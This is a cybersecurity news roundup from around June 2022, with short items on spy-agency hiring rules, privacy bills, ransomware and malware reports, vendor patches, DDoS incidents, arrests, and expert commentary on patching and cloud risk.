US intelligence agencies will soon be given the green light to hire IT experts that have smoked or consumed marijuana products in the past, something that has been prohibited until now, the WSJ reported. The measure, approved unanimously by the Senate Intelligence Committee on Wednesday, comes as the CIA, NSA, and other cybersecurity agencies have been struggling to find IT talent as many are disqualified out of the blocks because they consumed marijuana in previous months or in previous stages of their life. As marijuana has become legal in 19 US states and the District of Columbia, this new loosened hiring policy was a long time coming, although active marijuana consumption during government employment is still prohibited. Read more: U.S. Spy Agencies Could Hire Former Marijuana Users Under Senate Bill
US bill on privacy and data transfers
A bipartisan group of US senators has proposed a new bill this week that would ban the sale or transfer of private information belonging to US citizens to foreign countries considered a national security risk, such as China or Russia. The new bill is named the Protecting Americans’ Data from Foreign Surveillance Act and was sponsored by Senator Ron Wyden (D-Ore), Senator Cynthia Lummis (R-Wyo), Senator Sheldon Whitehouse (D-RI), Senator Marco Rubio (R-Fla), and Senator Bill Hagerty (R-Tenn). Read more: Wyden, Lummis, Whitehouse, Rubio and Hagerty Introduce Bipartisan Legislation to Protect Americans’ Private Data from Hostile Foreign Governments
Lithuania DDoS alert
The Lithuanian National Cyber Security Center has issued an alert about an increase in DDoS attacks targeting local websites. According to the agency, most of the DDoS attacks are directed against public authorities, transport, and financial sectors, and the attacks have caused temporary disruptions to services. The attacks came as pro-Russian hacktivist groups announced plans to launch DDoS attacks against Lithuanian websites after the country said it wouldn’t allow trains carrying Russian sanctioned goods to pass through its territory to Russia’s Kaliningrad enclave. Read more: NKSC fiksuoja išaugusį paslaugų trikdymo kibernetinių atakų skaičių Lietuvoje
Conti infrastructure goes down
After news that the Conti gang was preparing to disband into smaller operations last month, Conti infrastructure has finally gone down for good, confirming earlier reporting.
Vulnerabilities used by ransomware gangs
Tenable has a report out on the ransomware ecosystem. The report includes a list of 78 vulnerabilities exploited by ransomware groups for their attacks. Read more: A LOOK INSIDE THE RANSOMWARE ECOSYSTEM
Broadcom’s Symantec team is reporting a rise in instances of Search Marquis, a browser hijacking malware strain that targets macOS users.
CISA and the US Coast Guard Cyber Command said in an advisory on Thursday that VMWare Horizon and VMWare Unified Access Gateway (UAG) are still being actively attacked using the old Log4Shell vulnerability disclosed last year. CISA said attacks had been spotted from cybercrime and state-backed groups alike. The warning also comes as Cisco Talos issued a similar warning earlier this week about the AvosLocker ransomware gang using Log4Shell to compromise VMWare UAG systems. Read more: Avos ransomware group expands with new attack arsenal
Scalping bots hit Israeli government sites
In a report on Thursday, security firm Akamai said that it detected several scalping bots targeting MyVisit, the appointment scheduling platform used by many Israeli government offices. Akamai says that these bots have been filling government appointment slots at various agencies and then reselling the slots on the dark market for a profit, with some slots going as much as $100. Read more: Bots Are Scalping Israeli Government Services
Brian Krebs has published an exposé on the people running the RSocks rent-a-proxy service, seized by the FBI and US DOJ earlier this week. Read more: Meet the Administrators of the RSOCKS Proxy Botnet
Group-IB has a report on the activities of the Conti ransomware cartel based on their leaked chats. The research dives deep into the history and major milestones of one of the most aggressive and organized ransomware operations, which, according to Group-IB, has hit at least 850 organizations across the world. Read more: The Conti Enterprise: ransomware gang that published data belonging to 850 companies
Greek security researcher Anastasios Pingios has published an analysis of SUAVEEYEFUL, a CGI software implant for FreeBSD and Linux. The malware was developed by the Equation Group (believed to be the US NSA) and was used to spy on the email traffic of the Chinese MFA and the Japanese Waseda Research University in the early 2000s. The implant’s existence was revealed during the ShadowBrokers leak in 2017. The leaked version targeted MiraPoint email products specifically. Read more: The forgotten SUAVEEYEFUL FreeBSD software implant of the EQUATION GROUP
Check Point has published a report on a Chinese APT, which they believe has possible ties to the Tropic Trooper (KeyBoy) threat actor. The CP report focuses on the group’s new malware strain, named Nimbda, a malware loader coded in the Nim programming language, as well as a new variant of the Yahoyah trojan, focused on collecting information about local wireless networks. Read more: Chinese actor takes aim, armed with Nim Language and Bizarro AES
Sekoia has a report out on Calisto—the Russian threat actor that Google TAG tracks as Cold River—and which has been targeting Western NGOs, think tanks, and the defense sector. Sekoia reports on this group’s use of Evilginx, a tool that allows it to set up reverse proxies on phishing pages to intercept authentication cookies and bypass 2FA. Read more:
- Exclusive: Russian hackers are linked to new Brexit leak website, Google says
- CALISTO continues its credential harvesting campaign
Russia’s cyber operations
Microsoft has published an updated version of its report [PDF] describing Russia’s cyber operations since its invasion of Ukraine. The report—an update to a previous version released in April—details destructive cyberattacks within Ukraine, network penetration and espionage outside Ukraine, and cyber influence operations targeting people around the world.
The MEGA file-sharing service has released fixes this week for a set of vulnerabilities that could have allowed threat actors to decrypt customer files. The issues, named MEGA-awry, wer discovered by academics from ETH Zurich and is a bug in the company’s implementation of the AES-ECB encryption cipher, which MEGA uses to encrypt customer files before syncing them to its servers. In a blog post on Wednesday, MEGA said it was not aware of any user accounts being compromised by this attack. Read more: MEGA Security Update
Cloud security firm Aqua Security has open-sourced a supply chain auditing tool named Chain-bench. Read more: Aqua Security Ships Open Source Tool for Auditing Software Supply Chain
Ukraine DDoS protection
Radware has announced that it will provide pro-bono DDoS mitigation services to the Ukrainian government. Read more: Ukraine’s State Service of Special Communications and Information Protection Selects Radware for Cloud and Application Security Services
Mandiant has released v2 of FLOSS, a tool the company’s analysts have used to deobfuscate strings found inside malware binaries.
Millions Of Secrets Exposed Via Web Application Frontend
They found ~1.2M secrets: Stripe, reCAPTCHA, Google Cloud, AWS, Google OAuth, Facebook, and more.
US TikTok User Data Has Been Repeatedly Accessed From China, Leaked Audio Shows
In addition to the data accessed, what about being able to control the algorithm that influences what people see? What sort of influence could this have over Americans’ commercial, cultural, or political behavior? Much I imagine.
“I feel like with these tools, there’s some backdoor to access user data in almost all of them,” said an external auditor hired to help TikTok close off Chinese access to sensitive information, like Americans’ birthdays and phone numbers.
What It Means that the U.S. Is Conducting Offensive Cyber Operations Against Russia
Gen. Paul Nakasone’s remarks this month about offensive operations against Russia caused a stir. Kim Zetter goes into what that means. Read more: What It Means that the U.S. Is Conducting Offensive Cyber Operations Against Russia
Cisco patches critical, high-severity vulnerabilities in Email Security Appliance, home routers
Cisco patched several significant vulnerabilities last week, including some in end-of-life routers it will not fix. One critical vulnerability exists in the Email Security Appliance, Secure Email and Web Manager software. Any virtual or hardware appliances running a vulnerable version of AsyncOS are affected by this vulnerability, potentially allowing attackers to bypass security protections in place on the machine. There is also a fix out for a high-severity issue in the same products that could allow an adversary to obtain information from an LDAP external authentication sever connected to the vulnerable appliance. Another issue, CVE-2022-20825, could allow an unauthenticated attacker to execute remote code on several models of Cisco’s RV series of routers. However, the devices have reached their end-of-life periods and the vulnerability will not be patched. Read more: Cisco Patches Critical Vulnerability in Email Security Appliance
- web3rekt database launched keeping track of blockchain incidents and scams dating as far back as 2012.
- Cryptocurrency crime and anti-money laundering report by CipherTrace.
- Solana DeFi platform votes to control whale account via ’emergency powers’ in bid to avoid liquidation ‘chaos’.
- On June 13, 2022 FSwap lost $390K in a price manipulation attack taking advantage of its fee handling logic.
- On June 16, 2022 Inverse Finance lost $1.26M in a price oracle manipulation exploit. Interestingly the exploit TX was almost frontran if not for a boost from an MEV bot.
- On June 18, 2022 Tether’s web infrastructure came under DDoS attack following an unsuccessful ransom demand.
- OpenSea patched a critical vulnerability which could allow theft of offered WETH from users’ wallets thanks to a responsible disclosure by Gus.
- OpenSea patched a vulnerability which could allow sellers to receive payments for Shared Storefront items they did not own. The vulnerability was responsibly disclosed by MevRefund.
- Phantom wallet and Metamask patched a vulnerability which could expose secret recovery phrase after it was responsibly disclosed by Halborn.
- MetaMask Clickjacking Vulnerability Analysis by SlowMist.
- Hertzbleed is a new family of side-channel attacks which may allow attackers to extract cryptographic keys from remote servers.
- Darknet Diaries – EP 119: Hot Wallets on the NiceHash hack by North Korea.
Top websites have sucky password policies
A team of academics from Princeton University analyzed the password policies of today’s top 120 of the most popular English-speaking websites and found that even after years of “recommendations” from security experts, the vast majority of these sites still had ridiculously bad rules for when users had to create an account password.
The team—led by the notorious privacy advocate and Princeton professor Arvind Narayanan—focused their research on three of the most basic industry best practices for when setting up a new password:
- Check user passwords against lists of leaked and easily-guessed passwords;
- Provide real-time password strength meters;
- Do not require specific character classes in the password’s make-up.
But while these sound like very simple requirements, they are not widely implemented. The research team said that only 15 of the 120 websites they analyzed followed these recommendations.
In fact, their findings are absolutely astounding(ly bad):
- More than half (71/120) of websites do not check passwords at all, allowing 40 of the most common passwords (e.g., “12345678”, “rockyou”) to be used as account credentials, with no warning to the user that they may be at risk of account hijacking.
- Only 23 of the 120 websites used password strength meters, and ten of these sites misused meters in the sense of nudging users toward specific types of characters.
- In addition, 54 out of the 120 websites still require specific character classes such as digits or special characters to be included in the password, a practice that has been shown to be dangerous, as users tend to select simpler and easier to-remember passwords as a result.
The research team gives Facebook as a good example of how many of these policies appear to be cobbled together with no actual thinking behind the process and how websites are stimulating users toward using weaker passwords.
The researchers also looked at some of the reasons why, in 2022, so many popular websites still haven’t learned anything from the hacks from the last decade.
One of the reasons they put forward was that companies are shifting their attention to multi-factor authentication, and many websites may not care to strengthen their password policies. Another was related to auditors.
“Websites need to pass security audits, and the firms who do these audits, such as Deloitte, recommend or mandate outdated practices,” researchers said.
Romanian-based VPN provider BeanVPN appears to have leaked 25 million records. According to CyberNews, the leaked data included details such as user device IDs, Play Service IDs, internet protocol addresses (IPs), and connection timestamps, among other diagnostic information.
Elsewhere, an Elasticsearch server owned by PoS software vendor StoreHub also leaked the personal data of thousands of customers (companies) and more than one million of their staff, according to SafetyDetectives.
Rust Foundation grants
The Rust Foundation has announced its first-ever grants; funds the Foundation will be providing to open-source developers and programs for improving the Rust programming language and its integration with other projects. In total, $650,000 were dispensed to 41 recipients, including for projects for improving Rust’s documentation, the Crates package repository, its Windows library, and others.
A bill proposed by Sen. Blumenthal (D-CT) meant to force companies like Apple and Google to open their in-store payment systems to other payment options is considered too broad, as it requires the tech companies to open all their APIs, including those used for sensitive operations, like encryption and backups. Even worse, as spotted by John Hopkins Prof. Matthew Green, the bill also contains a clause that can allow US law enforcement to close certain APIs to companies or entities that may be considered a “national security threat,” which Green argues could be used to go after apps of encrypted IM solutions.
Around 25 Iranian Instagram accounts that shared stories of sexual violence and posted about the Iranian MeToo movement this spring were flooded with subscriptions from bot profiles. The Qurium Foundation, which investigated this harassment campaign, believes the attackers were trying to get the accounts banned for boosting.
Senator Elizabeth Warren (D-Mass.) introduced a bill on Wednesday to regulate the sale of Americans’ sensitive information. The bill—named the Health and Location Data Protection Act—would prohibit the sale or transfer of information about location and health data without valid authorization.
Alexa data used for ads
A new lawsuit filed this week claims that Amazon used audio recorded through the Alexa personal assistant to target users with personalized ads, a practice Amazon has long denied.
Google fined in Russia
A Russian court has fined Google 15 million rubles (~$260,000) after the company has refused to store the data of Russian citizens on servers within the Russian Federation.
US authorities seized the website and infrastructure of RSocks, an online service selling access to proxy servers all over the world. Authorities said RSocks had been built on top of a botnet of hacked computers, smartphones, and IoT devices. The botnet, supposedly operated by Russian cybercriminals, had allegedly grown from 325,000 hacked devices in 2017 to millions of devices this year, the DOJ said in a press release on Thursday.
Call center and BEC arrests
Interpol said it detained more than 2,000 suspects as part of an international crackdown against BEC scammers, online fraudsters, romance scammers, money launderers, and scammy call center operators. The arrests were part of Operation First Light 2022, and authorities said they also froze more than 4,000 bank accounts and seized more than $50 million worth of stolen funds.
Dutch police have detained a 22-year-old from the city of IJmuiden on suspicion of being part of an online cybercrime group specialized in phishing and money laundering. The suspect had been detained at the request of Belgian authorities.
A Florida judge sentenced a 41-year-old man to nine years in federal prison for hacking into iCloud accounts of more than 4,700 users, stealing sensitive images, and then sharing and trading the data on Anon-IB, a now-defunct website famous for hosting “revenge porn.” The man, Hao Kuo Chi, 41, of California, went on the forum as “icloudripper4you” and authorities said he obtained and shared sensitive images for more than 500 of his hacked victims.
Russian hacker arrested
Russian officials have detained a man named Oleg Rusakovich on accusations of hacking into the systems of the Russian Federal Customs Services and modifying entries in the system to make sure certain goods cleared customs procedures.
Sophos has a report out on a series of attacks against Telerik UI-based apps. The final payload in these attacks has been Cobalt Strike beacons and crypto-miners.
ISC SANS is reporting on new campaigns distributing Houdini, a very old remote access trojan.
Initial access prices
Kaspersky’s threat intel team has a good report on the current prices on the initial access market for access to hacked corporate and government networks.
In a report on Wednesday, Akamai detailed Panchan, a new peer-to-peer botnet and SSH worm that emerged in March 2022 and has been actively compromising Linux servers since. The botnet is written in Go, and its main purpose appears to be cryptocurrency mining.
F5 says that while it was tracking FluBot, they found a new Android banking trojan named MaliBot. Current versions of the malware can carry out web injection and overlay attacks, steal MFA codes, steal authentication cookies, steal wallet data, steal SMS messages, and provide VNC access to infected devices for remote access, among many other features.
Qualys has a report out on the Redline Stealer and a recent campaign where threat actors used ZIP archives with fake cracked software to distribute the malware.
Security firm Lookout has published a report on Hermit, a piece of “enterprise-grade Android surveillanceware” that was used to spy on Kazakh government officials. The company said the malware was developed by Italian spyware vendor RCS Lab SpA and telecommunications company Tykelab Srl, and that previous instances where Hermit was also deployed included Italy (by law enforcement) and Syria.
Indian police framed reporters
Researchers at security firm SentinelOne and nonprofits Citizen Lab and Amnesty International told Wired that they found evidence to formally link the Pune Police Department to a case where fake evidence was planted on the laptops of two Indian activists (Rona Wilson and Varvara Rao) the same department detained in 2018 on terrorism-related charges. Previous reporting on their case had found that the evidence that led to their arrest was planted on their devices, but investigators could not identify who planted the evidence. The two activists, along with 16 other suspects, are still on trial in India.
Volexity said in a report on Wednesday that it spotted a new Chinese APT using zero-day in the Sophos XG firewall earlier this year in March. Named DriftingCloud, this threat actor used the Sophos XG zero-day (CVE-2022-1040) to install web shells on the firewall, create VPN accounts for future access, and then proceeded to intercept and tamper with DNS traffic in order to redirect the victim organization’s employees to malicious servers. These servers performed MitM attacks and collected credentials and authentication cookies for other internal apps, helping the attackers escalate their access to other internal company resources.
A Polish security researcher said they received a legal threat from Powertek after disclosing vulnerabilities in the company’s power distribution units. The company backed down on the threat a few hours later, calling it a miscommunication around the first-ever bug report they received.
Security researchers from Halborn discovered a vulnerability affecting many major cryptocurrency wallets. Named Demonic, the vulnerability takes place in situations where certain cryptocurrency wallet browser extensions accidentally store the wallet owner’s secret recovery phrase on disk, in plaintext, allowing attackers to recover it in situations where they have access to the victim’s device. Impacted wallets include MetaMask, Brave, Phantom, and xDefi. The vulnerability is tracked as CVE-2022-32969, and all the wallet makers have released fixes, according to the researchers.
Ninja Forms vulnerability
WAF provider Wordfence disclosed a major vulnerability in Ninja Forms, one of the most popular WordPress plugins today. The vulnerability allows unauthenticated remote code injection, has a CVSS score of 9.8/10, and patches are already out.
Proofpoint published new research this week detailing a possible scenario where a threat actor who gained access to a customer’s SharePoint or OneDrive accounts could modify the file auto-saving versioning limit to “1” and then encrypt files with ransomware twice, and by doing so ensuring that the victim organization doesn’t have access to previous versions of the locked files. The good news is that while the attack is plausible, in the case of a ransomware attack, Microsoft support staff can restore a customer’s files to any previous point from the previous 14 days, according to this support page and Matt Swann, Chief Security Architect for OneDrive and SharePoint at Microsoft.
After earlier this week, academics published details about the Hertzbleed attack a team of Intel researchers has published their own paper on the topic, along with more extensive and detailed mitigations to prevent possible attacks.
RDP vulnerability finally patched
CyberArk has a write-up on the backstory of a vulnerability in the Windows Remote Desktop feature that was initially disclosed in January and needed a second patch in April to plug all the attack holes.
Patch Tuesday is not ending
Someone started some dumb rumor that Microsoft will stop providing security updates during Patch Tuesdays. That’s obviously false, Microsoft told SecurityWeek.
GitHub said on Wednesday that every time it would detect a threat actor’s attempt to insert malware into open-source projects, it would also add an entry in its GitHub Advisory Database, a place the company previously logged only vulnerability-related issues.
The schedule for this year’s Black Hat Arsenal edition has been made public. Black Hat Arsenal is the conference tracklist where security researchers present new infosec-related tooling.
Firmware security firm Eclypsium has expanded its leadership team.
Security researcher Marcus “MalwareTech” Hutchins has released a tool that can extract payloads from Office files weaponized with the Follina zero-day.
Security firm PIXM has released a report on a massive and successful Facebook phishing campaign. The campaign used legitimate services such as famous.co and glitch.me to redirect to phishing pages. Once phishing links on these services were detected and blocked, new ones were rapidly created at a new unique id. As these services were legitimate, Facebook wasn’t able to block them en masse, and the person(s) responsible would use compromised Facebook accounts to send phishing links to contacts on Facebook Messenger.
PIXM discovered the campaign had openly available traffic monitoring statistics and they extrapolate the phishing sites in aggregate may have received around 400m sessions, although they believe they have seen only a fraction of the campaign. Bring on passwordless login systems.
Ransomware is Underreported
At the RSA conference this week, FBI and Department of Justice officials reported that only a quarter of NetWalker ransomware victims reported incidents to law enforcement. Officials were able to get comprehensive information about attacks and even build a decryptor after seizing NetWalker servers in Bulgaria in 2020.
Good News, More BEC!
Wired covers the argument that as governments crack down on ransomware and illicit cryptocurrency payments criminals may migrate from ransomware to Business Email Compromise. This makes sense as BEC is already more profitable than ransomware and could well be good news as it causes less operational disruption.
Firefox upping privacy
Firefox is rolling out “Total Cookie Protection”, which limits cookies, even for third-party content, to only the website that assigned that cookie. Mozilla says “this approach strikes the balance between eliminating the worst privacy properties of third-party cookies — in particular the ability to track you — and allowing those cookies to fulfil their less invasive use cases (e.g. to provide accurate analytics)”. This is really the way it should have been all along.
Splunk Releases Critical Update
Splunk released an emergency patch this week, addressing a critical vulnerability that could lead to arbitrary code execution. The vulnerability, CVE-2022-32158, has a CVSS score of 9.0. An attacker taking advantage of the flaw could execute code on endpoints connected to a particular deployment server. Splunk released patches only for Splunk 9.0; users of older versions need to upgrade to 9.0 to patch.
- If you’re on Splunk 9.0, you will need to apply the patch. Due to the newness of the patch, you may wish to wait for any updates/issues to be squared away, If you’re doing that, you need to disable the deployment server unless you’re actively using it to deploy configuration updates. The ISC blog below has details on this approach. If you’re not on Splunk 9.0, time to roll up your sleeves and get that update going.
- This does not impact Splunk Cloud users, so relevant to a bit more than half of Splunk customers. SaaS vendors have a simpler patching issue than IaaS vendors, but in procurement very important to ask about and evaluate the vendors patch time commitments, their use of external Cloud Service Providers and DoS protection as well as broader security processes and controls. Like many security software vendors, Splunk is seeing it cloud business grow more than twice as fast as on-premises deployments. But margins (profit on sales) are still lower for cloud sales vs. on-premise. Important to keep the pressure on all security vendors to make sure cloud security of their own offering is Job 1, even as they look to constrain costs to improve cloud profit.
Read more in
- Critical vulnerability in Splunk Enterprise?s deployment server functionality
- Splunk Enterprise deployment servers allow client publishing of forwarder bundles
- Critical Code Execution Vulnerability Patched in Splunk Enterprise
Microsoft Patch Tuesday Updates Include Follina Fix
On Tuesday, June 14, Microsoft released updates that address 60 security issues in a range of products. The updates include a patch for the Follina flaw in Microsoft Support Diagnostic Tool (MSDT). Three of the vulnerabilities fixed in this patch of updates have been deemed critical; the three remote code execution vulnerabilities affect Windows Network File System, Windows Hyper-V, and Windows Lightweight Access Protocol.
- The Follina fix was issued with a release date of May 30th, which caused a bit of confusion as it wasn’t part of the June 14th set of patches. But it is included in the rollup patches. Please apply expeditiously. Also note the NFS patch. While not enabled by default, this is the third month in a row for NFS patches and this time, additional details regarding the vulnerability have been published by the discoverer making an exploit more likely.
- The patches address both the MSDT flaw and the Windows Network File System flaws. The NFS 4.1 fix is for your servers, and while critical, you may wish to test prior to wide deployment. Also, in case you’re missing it, June 15 is the de-support date for IE – take care of your support and IT teams this month, it’s going to be busy.
Read more in
- Microsoft June 2022 Patch Tuesday
- Microsoft Patch Tuesday, June 2022 Edition
- Microsoft Patches ‘Follina’ Zero-Day Flaw in Monthly Security Update
- Follina vulnerability fixed in latest Patch Tuesday release from Microsoft
- Microsoft fixes under-attack Windows zero-day Follina
- Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability
- Security Update Guide
Microsoft Called Out for Dragging its Feet on Azure Fixes
Orca Security and Tenable both say that Microsoft has taken too long to address critical flaws in Azure. Orca Security’s Tzah Pahima said that Microsoft took more than four months to adequately fix a critical vulnerability in Azure’s Synapse Analytics. Researchers from Tenable detected two vulnerabilities in Synapse Analytics and reported them to Microsoft in early March; the issues were not acknowledged for nearly three months.
- Using the cloud (aka “someone else’s computer”) requires trust. Delayed fixes and missing transparency about the risks your data is exposed to does not build trust. On the other hand: As long as it is cheap and easy enough, people will probably use it anyway.
- I started Gartner’s coverage of cloud service security back in 2010 or so and a key issue was how cloud service providers would patch their underlying infrastructure. Testing patches to make sure a 10,000 user enterprise isn’t impacted is tough enough – Microsoft has over 700M users on Azure Active Directory. Obviously, Microsoft has the biggest problem since Windows vulnerabilities get outed the quickest, but Amazon AWS has the biggest market share (over 1M users). They have to walk the line between risk of customers being compromised by attackers exploiting the vulnerability and too-fast push out of patches that aren’t fully testing, leading to downtime at hundreds to thousands of customers. Right now, Microsoft is erring on the side of avoiding the latter, which is probably prudent since some recent MSFT patches have had to be recalled.
- It took Microsoft three tries to fix the vulnerability; the full fix was released in May. We have seen multiple patch cycles previously. The risk is that with cloud services you’re not only dependent on the software provider for the fix, just as with on-prem, but also restricted to the mitigations they provide, which is unlike on-premise services. Make sure that you’re considering this risk, weighed against the providers track record of deploying updates and inclusion of possible compensating security measures.
Read more in
- Azure issues not adequately fixed for months, complain bug hunters
- Researchers claim it took Microsoft over 100 days to patch Azure Synapse vulnerability
- Botched and silent patches from Microsoft put customers at risk, critics say
- SynLapse – Technical Details for Critical Azure Synapse Vulnerability
- Microsoft Azure Synapse Pwnalytics
- Microsoft’s Vulnerability Practices Put Customers At Risk
US HHS Security Risk Assessment Tool Version 3.3
The US Department of Health and Human Services (HHS) Office for Civil Rights (OCR) and National Coordinator for Health Information Technology (ONC) have released the Security Risk Assessment (SRA) Tool version 3.3. SRA “is designed to help healthcare providers conduct a security risk assessment as required by the HIPAA Security Rule and the Centers for Medicare and Medicaid Service (CMS) Electronic Health Record (EHR) Incentive Program.”
- This is just a port of the paper version of the OCR Security Risk Assessment tool to electronic/spreadsheet format. So, if you were already using the paper version, much easier to use. But the questionnaire is heavy on policy and compliance, much lighter on actual security defenses/controls. A decent starting point if you are starting from scratch but will also need tailoring for most environments. There are 64 questions with “I don’t know” as possible answers. The spreadsheet logic will show those as yellow for if you use that answer, but a “Huh?” response should be high risk/red – if you answer “I don’t know” on more than a handful, time to stop and get a detailed security assessment performed.
- Download the tool from the HealthIT.gov Security Risk Assessment Tool website (see link below). It is available as an application for windows 7/8/10/11 systems which stores data locally, or an Excel workbook. The questions include guidance for each of your possible answers, whether it is required, and the source for the question. Sections also include Threats and Vulnerabilities questions which you can leverage to see your risk score. Allow sufficient time to honestly assess yourself, resist the blame game. If you find yourself with a lot of critical or high-risk scores, or I-don’t-know answers, consider a professional engagement to help you both verify your assessment and devise a risk-based path forward.
Read more in
- ONC, OCR Release Updated Version of HHS Security Risk Assessment (SRA) Tool
- Security Risk Assessment Tool
Healthcare Entities Respond to HHS RFI on Cybersecurity Requirements
In April, the US Department of Health and Human Services (HHS) published a request for information (RFI) seeking public comment on current healthcare security practices and how HHS Office for Civil Rights (OCR) can help healthcare entities implement security measures. A common thread throughout comments from several healthcare-related organizations is that cybersecurity requirements need to be flexible rather than one size fits all.
- Most of the reaction has been because HHS OCR is asking many questions on how best to determine monetary penalties for failure to protect personal health information. HIPAA has been out since 1996, HITECH since 2009, OCR enforcement actions did not start until 2017 and have been mostly driven by complaints not by proactive assessments – since 2017, OCR has had 105,189 complaints and only 1,739 Compliance reviews and fines were assessed in only .06% of cases, roughly only 1 out of 1500. Bottom line: most likely outcome is language accepting use of widely accepted frameworks, followed by increase proactive assessment and higher occurrence of fines. Legislation moves slowly – earliest start is probably FY 24. So, develop a 2-3 year strategic gap closure plan to convince management to fund progress over that period to avoid future punitive actions (sounds scarier than just saying fines…)
- Security frameworks need to be viewed from both a risk perspective and a as a minimum bar. Use them to identify potential gaps in your protections, document your decisions.
Read more in
- Should healthcare cybersecurity framework be one-size-fits-all?
- RE: Considerations for Implementing the Health Information Technology for Economic and Clinical Health (HITECH) Act, as Amended (PDF)
Cloudflare Says it Mitigated a 26M rps DDoS Attack
Cloudflare detected and thwarted a 26 million request per second (rps) distributed denial-of-service (DDoS) attack against one of its customers. The attack occurred last week. It was the work of a botnet comprising just over 5,000 devices, mostly servers and virtual machine belonging to cloud service providers. In a blog post, Cloudflare’s Omer Yoachimik writes that the botnet was “4,000 times stronger [than most other botnets] due to its use of virtual machines and servers.”
- Since extended DDoS attacks can cause cloud service providers to start failing to meet service level agreements, the larger CSPs generally have strong DDoS filtering in place, usually a mixture on in their data centers and used of services like Cloudflare or Akamai/Prolexic. Make sure the security group is involved in evaluating cloud service procurements to assure thatsuch hybrid DDoS protection is part of the bid – payoffs on SLA failure only give your company rebates on future bills, no level of business interruption costs are included.
- Even though this thwarted attack was targeting services on the free tier Cloudflare plan, verify your CDN provides DDoS protections on the service you’re using. Cloudflare is comparing the relative impact for small device/IoT botnets (730,000 devices) versus smaller collections of server class nodes (5,067 devices). The larger botnet only generates 1.3 million rps, meaning while protecting your IoT devices is key, it’s still paramount to consider your physical and virtual servers as high value targets for acquisition. Pay particular attention to unexpected workload bursts, consistent with DDoS attack duration.
Read more in
- Cloudflare mitigates 26 million request per second DDoS attack
- Cloudflare says it thwarted record-breaking HTTPS DDoS flood
- A tiny botnet launched the largest DDoS attack on record
- Tsunami of junk traffic that broke DDoS records delivered by tiniest of botnets
- Cloudflare mitigates record-breaking HTTPS DDoS attack
Hertzbleed Side-Channel Attack
A newly-detected side-channel attack affects Intel and AMD x86 processors. Dubbed Hertzbleed, the flaw can be exploited to steal cryptographic keys by observing CPU frequency variations in the dynamic voltage and frequency scaling (DVFS) CPU-throttling technology. The researchers who detected the vulnerability acknowledged that exploits would require complex attacks. Intel and AMD do not have plans to release fixes.
Read more in
- New Hertzbleed side-channel attack affects Intel, AMD CPUs
- ‘Hertzbleed’ Side-Channel Attack Threatens Cryptographic Keys for Servers
- Frequency Throttling Side Channel Software Guidance for Cryptography Implementations
- Hertzbleed: Turning Power Side-Channel Attacks Into Remote Timing Attacks on x86 (PDF)
Citrix Fixes ADM Vulnerabilities
Citrix has released updates to address a pair of flaws affecting Citrix Application Delivery Management (ADM). An improper access control vulnerability could be exploited to allow a remote, unauthenticated user to corrupt the system and potentially reset the administrator password. An improper control of a resource through its lifetime issue could be exploited to temporarily disrupt the ADM license service. The flaws affect all supported versions of Citrix ADM server and Citrix ADM agent. Users are urged to upgrade to the most recent versions.
Read more in
- Citrix Application Delivery Management Security Bulletin for CVE-2022-27511 and CVE-2022-27512
- Critical Citrix Bugs Impact All ADM Servers, Agents
- Citrix warns critical bug can let attackers reset admin passwords
Latin American Government Face Serious Ransomware Risks
Latin American governments face a significant risk from ransomware attacks due to poor cyber hygiene, inadequate education, and immature infrastructure, according to researchers from Recorded Future’s Inskit Group. The researchers note that “If unaddressed, ransomware attacks on local, provincial, or federal government entities in LATAM could constitute a credible national and geopolitical security risk.”
- This is about cyber hygiene. Attackers are leveraging compromised credentials, which is best mitigated through the use of MFA. If you must hang on to reusable credentials, use services to check breach dumps for compromised credentials, to include rapid action for discovered compromised accounts.
- We have witnessed successful ransomware attacks against public sector bodies throughout the United States and Europe. There is no reason not to expect similar types of victims in other regions such as Latin America.
Read more in
- Latin American Governments Targeted By Ransomware
- Latin America governments are prime targets for ransomware due to lack of resources, analysis argues
- Latin American Governments Easy Prey for Ransomware During COVID-19 (from January 5, 2022)
Ukraine’s Internet Routed Through Russia
Ukrainian internet companies are reportedly being forced to reroute their traffic through Russia or shut down their connections. Russian troops are seizing Ukrainian Internet providers’ equipment and ordering employees to reroute traffic; if they refuse, the troops are able to make the changes themselves. In addition, a new mobile company in the city of Kherson appears to be selling SIM cards that connect to a network with numbers that uses the international prefix for Russia. Cloudflare’s head of data insight David Belson said, “Controlling internet access and being able to manipulate the internet access into an occupied area” is a “new front.”
- On the Internet, anything beyond the network jack in your system should be considered hostile anyway. Russia would be negligent not to reroute networks they physically control.
- This is why end-to-end encryption is so important. Encryption is not just a tool to protect privacy, it is also a critical security tool which not only protects data but, as exemplified here, can protect people’s lives and their freedoms. Those looking for backdoors into encryption need to role play what would happen if a hostile and/or oppressive government had access to individuals’ internet traffic.
- The Ukrainian ISPs don’t have a lot of choice here, as the Russians are able to make the changes if they refuse, and have physical access to the network equipment to obtain access. Watch to see if users can successfully use VPNs to bypass anticipated restrictions of access and attempted monitoring. If you are unsure of the network, wired/wireless or cellular you’re using, use a VPN to secure the connection to a trusted exit point. Note that some services filter connection methods some VPNs use, so be prepared to use alternate offerings.
Read more in
SBOMs Need to be Mapped to Known Vulnerabilities
In a blog post, Google’s Open Source Security Team observes that a software bill of materials (SBOM) by itself is not useful for determining security risks. Instead, a SBOM “needs to be mapped onto a list of known vulnerabilities to know which components could pose a threat.” The blog goes on to describe the process of using an open source tool to identify vulnerabilities in components included in a SBOM.
- Short response is no single action is alone complete for determining, let alone mitigating, software supply chain risks or any risk. SBOMs will have to part of the solution, but the starting point is enterprises having accurate software inventories – the most likely apps to be compromised are the ones that are NOT in ITs configuration management database or spreadsheet of software license.
- Information to make informed decisions is important. The usefulness of SBOMs will depend on how we consume/analyze them. It may become tricky to keep up with SBOM evaluation due to rate of update or complexity unless we have trusted automation to identify risks.
Read more in
- SBOM in Action: finding vulnerabilities with a Software Bill of Materials
- Google: SBOMs Effective Only if They Map to Known Vulns
Cloud Security Alliance: Top Cloud Computing Risks
The Cloud Security Alliance has published a report identifying the top cloud computing security risks faced by cybersecurity experts. Among things they noticed – a shift in cloud security responsibility from the service provider to the cloud adopter. The number one risk CSA identified is insufficient identity, credentials, access, and key management, which are the responsibility of cloud adopters. Other top risks include insecure interfaces and APIs; misconfiguration and inadequate change control; lack of cloud security architecture and strategy; and unsecure software development.
- The report includes business impact, key takeaways, examples, and security guidance for each of these risks. Use this to develop processes to ensure minimum security practices are implemented for your current and future cloud services.
cloudsecurityalliance.org: Top Threats to Cloud Computing Pandemic Eleven
Read more in
Prison Time for Selling DDoS Attack Services
